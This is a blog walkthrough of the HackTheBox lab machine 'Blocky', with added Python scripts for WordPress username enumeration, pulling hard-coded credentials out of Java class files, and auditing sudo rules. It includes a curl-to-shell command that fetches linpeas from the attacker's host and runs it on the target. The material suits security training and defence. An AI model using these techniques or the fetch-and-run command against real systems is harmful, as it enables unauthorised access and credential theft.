This is my first blog post and a step on my OSCP journey…
“Blocky” is a retired box from HackTheBox (11/200)
Let's start pwning it ❗️
The first thing to do is to scan the machine's ports with nmap.
nmap -sC -sV -oN nmap.txt 10.10.10.37
- -sC: run the default NSE script set against each open port
- -sV: detect the version of the service behind each open port
- -oN: save the normal (human-readable) output to a file
Looking at the results, port 80 is serving an Apache-hosted website, so that is the first place to look. FTP (port 21) and SSH (port 22) are open as well.
While enumerating the site we saw that it is a WordPress site, so the next move is wpscan. Before that we make blocky.com resolve to 10.10.10.37 by adding the line "10.10.10.37 blocky.com" to /etc/hosts.
wpscan --url http://blocky.com -e
- -e: enumerate; with no argument wpscan runs its default enumeration set, which includes users
This gave us a very useful piece of information: a valid username, 'notch'. We can confirm it against the WordPress login page.
“The password you entered for the username notch is incorrect” This message tells us that notch is an existing WordPress account; for a non-existent user WordPress responds with a different error, so the login form itself leaks valid usernames.
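The two different error messages turn wp-login.php into a username oracle. The script below is an added example, not code from the original post or from wpscan: classify_login_response() tells the "wrong password" reply apart from the "no such user" reply, and probe_user()/enumerate_users() send the requests. The host name blocky.com follows the /etc/hosts entry above; the response fragments at the bottom are constructed for offline use, not captured from the box.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): use the WordPress login form
as a username oracle.

wp-login.php answers a wrong password for an existing account with
"The password you entered for the username X is incorrect", while a name
that does not exist gets "Invalid username" (older releases) or
"The username X is not registered on this site" (newer ones).
Only run this against hosts you are authorised to test.
"""
import urllib.parse
import urllib.request
from typing import List

VALID_MARKER = "the password you entered for the username"
INVALID_MARKERS = ("invalid username", "is not registered on this site")


def classify_login_response(html: str) -> str:
    """Return 'valid', 'invalid' or 'unknown' for a wp-login.php error page."""
    text = html.lower()
    if VALID_MARKER in text:
        return "valid"
    if any(marker in text for marker in INVALID_MARKERS):
        return "invalid"
    return "unknown"  # lockout plugin, CAPTCHA, generic message, etc.


def probe_user(base_url: str, username: str, timeout: float = 10.0) -> str:
    """POST a deliberately wrong password for `username` and classify the reply."""
    form = urllib.parse.urlencode({
        "log": username,
        "pwd": "not-the-real-password",  # any wrong value; only the error text matters
        "wp-submit": "Log In",
        "redirect_to": base_url,
    }).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/wp-login.php",
        data=form,
        headers={"User-Agent": "Mozilla/5.0"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_login_response(resp.read().decode("utf-8", "replace"))


def enumerate_users(base_url: str, candidates: List[str]) -> List[str]:
    """Return the candidates the login page confirms as existing accounts."""
    return [name for name in candidates if probe_user(base_url, name) == "valid"]


# Constructed response fragments (not captured from the box) for offline use.
SAMPLE_VALID = ('<div id="login_error"><strong>Error</strong>: The password you entered '
                'for the username <strong>notch</strong> is incorrect. '
                '<a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>')
SAMPLE_INVALID_OLD = '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
SAMPLE_INVALID_NEW = ('<div id="login_error"><strong>Error</strong>: The username '
                      '<strong>steve</strong> is not registered on this site.</div>')

if __name__ == "__main__":
    for body in (SAMPLE_VALID, SAMPLE_INVALID_OLD, SAMPLE_INVALID_NEW):
        print(classify_login_response(body))
    # Live use against the lab host (needs the /etc/hosts entry from above):
    # print(enumerate_users("http://blocky.com", ["admin", "notch", "steve"]))
```

Each probe is one failed login, so a login-limiting plugin will start returning a lockout page after a handful of attempts; that is what the 'unknown' result is for, and it is also why the defensive fix is a single generic message for both cases.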
Our next step is to brute-force directories with gobuster, which will list the directories it can find on the site.
gobuster dir -u http://blocky.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -o Bustydirectory.txt -t 20
- dir: directory/file brute-forcing mode
- -u: target URL
- -w: wordlist to draw paths from
- -o: output file
- -t: number of concurrent threads (not requests per second)
Now let's check these directories…
Going through the wiki directory gave us the hint to look at the plugins directory, which was said to hold some useful database information.
Hmm… interesting!! What are we waiting for?
Let's check that directory then 😃
😮 They are Java archives (.jar files). jd-gui can open a jar directly, but I extracted them first and then read the .class files with jd-gui. On Kali the tool can be installed with
sudo apt-get install jd-gui
I extracted them into the decompile and decompile2 folders respectively:
jar xvf /decompile/BlockyCore.jar
jar xvf /decompile2/griefprevention-1.11.2-184.108.40.2068.jar
Here is what we see after extracting BlockyCore.jar.
Using jd-gui to read the class files.
Looking through BlockyCore.class I found the “password” that will let us in. Compiled classes keep their string literals in the clear, which is why the database username and password are readable here without the source.
To make life easier I saved both credentials in a file named “credentials”.
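jd-gui does the job, but a decompiler is not strictly needed: javac stores every string literal in the class file's constant pool as a CONSTANT_String entry pointing at a CONSTANT_Utf8 entry, so the credentials can be pulled out by walking that structure. The script below is an added example, not code from the original post; it reads a jar or a single .class straight from disk, and the class file it builds for the offline demo is constructed for the demo, not BlockyCore.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): pull hard-coded string
constants out of compiled Java classes without a decompiler.

The layout follows the JVM class file specification (magic, versions,
constant_pool_count, then the pool). Only Utf8 (tag 1) and String (tag 8)
entries are decoded; every other tag is skipped by its fixed size.
"""
import struct
import sys
import zipfile
from pathlib import Path
from typing import Dict, List

# Constant pool tags other than Utf8/String and the size of their payloads.
_FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
               12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def class_string_constants(data: bytes) -> List[str]:
    """Return every string literal (CONSTANT_String) in a class file, in pool order."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pos = 10
    utf8: Dict[int, str] = {}     # pool index -> decoded text
    string_refs: List[int] = []   # Utf8 indexes referenced by CONSTANT_String
    index = 1
    while index < count:
        tag = data[pos]
        pos += 1
        if tag == 1:  # CONSTANT_Utf8: u2 length, then bytes
            (length,) = struct.unpack_from(">H", data, pos)
            pos += 2
            # Java uses "modified UTF-8"; plain UTF-8 is identical for ASCII secrets.
            utf8[index] = data[pos:pos + length].decode("utf-8", "replace")
            pos += length
        elif tag == 8:  # CONSTANT_String: u2 index of a Utf8 entry
            (ref,) = struct.unpack_from(">H", data, pos)
            pos += 2
            string_refs.append(ref)
        elif tag in _FIXED_SIZE:
            pos += _FIXED_SIZE[tag]
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos - 1}")
        index += 2 if tag in (5, 6) else 1  # Long and Double take two slots
    return [utf8[ref] for ref in string_refs if ref in utf8]


def jar_string_constants(jar_path: str) -> Dict[str, List[str]]:
    """Map each .class inside a jar to its string literals (no extraction needed)."""
    found: Dict[str, List[str]] = {}
    with zipfile.ZipFile(jar_path) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                found[name] = class_string_constants(jar.read(name))
    return found


def build_class_with_strings(literals: List[str]) -> bytes:
    """Constructed minimal class file (not from the box) holding the given literals.
    The JVM would reject it (this_class is 0); it exists only to exercise the parser."""
    pool = b""
    count = 1
    for lit in literals:
        raw = lit.encode("utf-8")
        pool += struct.pack(">BH", 1, len(raw)) + raw  # CONSTANT_Utf8 at index `count`
        pool += struct.pack(">BH", 8, count)          # CONSTANT_String -> that Utf8
        count += 2
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, count)
    # access_flags, this_class, super_class, interfaces/fields/methods/attributes counts
    trailer = struct.pack(">HHHHHHH", 0x0021, 0, 0, 0, 0, 0, 0)
    return header + pool + trailer


if __name__ == "__main__":
    if len(sys.argv) > 1:
        path = sys.argv[1]
        results = ({path: class_string_constants(Path(path).read_bytes())}
                   if path.endswith(".class") else jar_string_constants(path))
        for cls, strings in results.items():
            for s in strings:
                print(f"{cls}: {s!r}")
    else:
        demo = build_class_with_strings(["root", "hunter2", "jdbc:mysql://localhost"])
        print(class_string_constants(demo))
```

Run it as python3 jarstrings.py BlockyCore.jar (the file name is whatever you save the script as); a JDBC URL printed next to a short opaque token is the pattern to look for. Unlike jd-gui it does not show which field each literal is assigned to, so for anything beyond a quick triage the decompiler is still the better tool.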
From here there are three ways to own this machine. I will list all three, but we will go with the easiest one; yes, we won't learn as much this time, but that's fine as long as we are learning 😉
- SSH in with the recovered credentials, then abuse notch's sudo rights (the "sudo vulnerability")
- Gaining access as www-data (via FTP)
- Kernel exploit (CVE-2017-6074)
Gaining a foothold
We tried the credentials against the WordPress login page and could not get in. We then tried them over SSH and got into the machine.
Noice!! We have captured the 🏁 user flag.
Privilege escalation
The tool I used for privilege escalation is linpeas.sh from the PEASS-ng project. We need to get the script onto the machine, and for that we will use curl; first we serve the file from our own machine over HTTP so the target can fetch it from us.
sudo python -m SimpleHTTPServer 80
This serves the current folder over HTTP on port 80 (sudo is needed because 80 is a privileged port; SimpleHTTPServer is the Python 2 module, the Python 3 equivalent is http.server). Run it from the folder that contains linpeas.sh.
The command below, run on the target, fetches the script, pipes it straight into sh and saves the output in linpriv.txt. 10.10.14.9 is our attacking machine's VPN address. Any flags meant for linpeas itself (such as its -a, run all checks) have to be passed as "sh -s -- -a"; a flag written directly after sh is taken by the shell, not by the script.
curl 10.10.14.9/linpeas.sh | sh > linpriv.txt
linpeas colours its output with ANSI escape codes; to read the saved file in colour use
less -r linpriv.txt
So, to recap: after gaining user-level access over SSH we are now escalating to a higher level, root. To become root we have to find a weakness in the system's configuration, and linpeas.sh, a script that searches for possible paths to escalate privileges on Linux/Unix* hosts, does that hunting for us.
Going through its output we found the "sudo vulnerability" listed as the first method above: notch can run commands through sudo.
With that one word, sudo, we can do whatever we want. Even though we were the notch user and the root directory was not accessible to us directly, we could still read the root.txt flag 🚩 hiding in /root by running the command through sudo. Sudo itself is not the vulnerability; the misconfiguration is that a user with ordinary access has been granted the right to run anything as root, which makes user-level access root-level access in practice. The quick way to confirm what an account may run is sudo -l, which lists its sudo rules.
After that I used the following command to become the root user
Lessons learned
- A login form should not vary its error message with whether the submitted username exists, since that enables user enumeration; it is exactly how we confirmed notch.
- Files containing any kind of username or password, compiled code such as BlockyCore.jar included, should not be publicly reachable, and a database password should never double as an account's SSH password.
- Users should not be given unrestricted sudo rights; grant only the specific commands an account needs and review what sudo -l shows for each user.
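Both the escalation step and the last lesson come down to one check, sudo -l. The script below is an added example, not code from the original post or from linpeas: it parses sudo -l output, separates the runas part from the NOPASSWD tag and the command list, and flags rules that grant any command as root (or as ALL) and rules that need no password. The sample output it ships with is constructed to show both cases; it is not the real output from Blocky.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): flag dangerous rules in the
output of `sudo -l`. Use it as `sudo -l | python3 sudo_audit.py` on the box,
or run it with no input to see the constructed sample below.
"""
import re
import sys
from dataclasses import dataclass
from typing import List

# A rule line from `sudo -l` looks like:  (runas) [NOPASSWD:] cmd1, cmd2
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


@dataclass
class SudoRule:
    runas: str            # e.g. "ALL : ALL" or "root"
    nopasswd: bool
    commands: List[str]

    @property
    def unrestricted(self) -> bool:
        """True when the rule allows any command (ALL) as root or as anyone (ALL)."""
        runas_user = self.runas.split(":")[0].strip()
        return "ALL" in self.commands and runas_user in ("ALL", "root")


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract the rules from `sudo -l` output; the Defaults block is ignored."""
    rules: List[SudoRule] = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(" ", "").split(":")
        commands = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append(SudoRule(m.group("runas").strip(), "NOPASSWD" in tags, commands))
    return rules


def audit(output: str) -> List[str]:
    """Return human-readable findings, unrestricted rules first."""
    full_root: List[str] = []
    no_password: List[str] = []
    for rule in parse_sudo_l(output):
        if rule.unrestricted:
            full_root.append(f"FULL ROOT: ({rule.runas}) may run ALL"
                             + (" without a password" if rule.nopasswd else ""))
        elif rule.nopasswd:
            no_password.append(f"NOPASSWD: ({rule.runas}) {', '.join(rule.commands)}")
    return full_root + no_password


# Constructed sample (illustrative, not the real output from Blocky).
SAMPLE = """\
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/tail /var/log/apache2/access.log
"""

if __name__ == "__main__":
    text = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for finding in audit(text) or ["no unrestricted or NOPASSWD rules"]:
        print(finding)
```

A FULL ROOT finding is the Blocky situation: any command, including reading /root/root.txt, is one sudo away. NOPASSWD rules on specific binaries are listed separately because whether they are exploitable depends on the binary, which is a judgement the script leaves to you.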